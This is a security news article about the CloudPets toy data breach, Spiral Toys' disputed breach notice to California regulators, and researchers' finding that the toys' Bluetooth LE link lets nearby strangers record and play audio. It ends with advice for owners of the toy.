The CloudPets data breach saga continues, as Spiral Toys finally reported the breach to the California Attorney General’s Office.
As a reminder: Leaked data provided to security researcher Troy Hunt showed that MongoDB databases containing personal information, hashed passwords and voice recordings of messages by children and parents using CloudPets teddy toys were sitting unprotected on the Internet since December 2016.
The databases were repeatedly accessed by unauthorized users, some of which apparently dumped the contents on their servers, deleted the databases, and asked for ransom to return the data.
Downplaying the seriousness of the data breach
The breach notice sent to the California Attorney General’s Office includes false claims that the company was told about a potential breach on February 22, when researchers and reporters repeatedly sent messages to as many company email addresses and social media accounts they could find, warning them of the breach.
Hunt has gone through the notice and pointed out (at the very end of the write-up) the many inaccuracies and misinformation included in it, so I won’t be repeating them here. Suffice to say that the company is still trying to make it look like they did everything they could to prevent a breach, and that the breach is not as extensive as it effectively, provenly is.
CloudPets security is a nightmare
When all this is taken into consideration, it shouldn’t come as a surprise that the CloudPets toys were found to lack security protections that would prevent them from becoming remote surveillance devices.
Context Information Security researchers have been testing CloudPets toys for a few months now, and have discovered that the toy uses the Bluetooth LE (Low Energy) wireless personal area network technology to communicate with a smartphone app.
They also found that it’s easy to set up a webpage that could send instructions to a nearby toy to remotely trigger its recording functionality, download the recorded audio and play it back on a phone, record audio from the phone, and upload it to the toy, etc.
They even provided the code for it on Github, so others can test the attack (on a CloudPet toy that they own). The code uses Chrome’s new Web Bluetooth API to communicate with the toy, and works only on Chrome on Windows and on Chrome OS.
“Anyone can connect to the toy, as long as it is switched on and not currently connected to anything else. Bluetooth LE typically has a range of about 10 – 30 meters, so someone standing outside your house could easily connect to the toy, upload audio recordings, and receive audio from the microphone,” the researchers noted. The attack is demonstrated in this video:
Context IS researchers repeatedly tried to contact Spiral Toys and responsibly share their findings with them so that the issues can be fixed before they publicly reveal their existence. As others before them, they received no acknowledgement from the company.
At this point, consumers who bought a CloudPet would do well to throw out the toy or at least take out the batteries. They should also try to delete the CloudPets account and, finally, uninstall the associated mobile app.